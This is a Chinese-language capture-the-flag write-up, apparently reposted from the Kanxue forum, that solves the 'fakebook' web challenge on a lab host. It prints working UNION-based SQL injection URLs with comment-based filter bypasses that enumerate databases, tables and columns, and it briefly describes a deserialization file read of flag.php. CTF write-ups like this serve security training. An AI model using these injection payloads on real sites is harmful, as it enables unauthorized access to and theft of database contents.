攻防世界fakebook关卡攻略
2020-02-21 18:59:00 Author: mp.weixin.qq.com(查看原文) 阅读量:176 收藏

本文为看雪论坛优秀文章
看雪论坛作者ID:xiaobaijia
首先我们进入到高手进阶区获取到题目:

进来后题目场景会给我们提供一个IP地址:http://111.198.29.45:58599

下面开始进行解题。

首先通过brup对网站目录进行爬取,获取到一些有用的信息。

通过brup对网站进行爬取后,发现一个可疑路径file:///var/www/flag.php还发现了robots.txt文件。我们对robots.txt文件进行访问。
访问后发现一个可爬取的备份文件。进行访问,可以下载到源码。对代码进行审计,奈何代码0基础,先放着吧!

信息收集完毕。

进入页面首先访问的就是这个页面:


点击 join填写信息后发现我们的页面进行了跳转:

进入到下一个界面:

发现no=1可疑的url,查看是否存在SQL注入:

比较懒,通过sqlmap检测是否存在SQL注入:

通过检测可以判断存在注入点可以进行注入,由于工具sqlmap过waf不太熟练下面手工进行注入。
通过order by 判断列为4,大于4或小于均4报错,因此判断此列为4:

经测试,发现此页面对字符进行了过滤
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata  --+

获取到数据库:
fakebook,information_schema,mysql,performance_schema,test
下面获取表:
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"--+

表名为users。
获取字段
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"--+
 
获取字段信息,查看字段发现我们提交的数据被序列化:

猜想,是否可以在no=1注入处进行反序列化读取本地文件,反序列化语句构造:

查看源码:

获取到flag!
各位大佬不喜勿喷,小白一枚!希望能和各位大佬多多交流。
- End -

看雪ID:xiaobaijia

https://bbs.pediy.com/user-881354.htm 

*本文由看雪论坛 xiaobaijia 原创,转载请注明来自看雪社区。

推荐文章++++

CVE-2017-11882理论以及实战样本分析

恶意代码分析之 RC4 算法学习

CVE-2017-0101-Win32k提权分析笔记

ROPEmporium全解

实战栈溢出漏洞

好书推荐

公众号ID:ikanxue
官方微博:看雪安全
商务合作:[email protected]
“阅读原文”一起来充电吧!

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458303600&idx=1&sn=920469735b47ff6908a8438247adbf11&chksm=b1818cfa86f605ecc23b0f80eae23adc4a66d3d20c948929f7f30dd0d08f6df83e4781456674#rd
如有侵权请联系:admin#unsafe.sh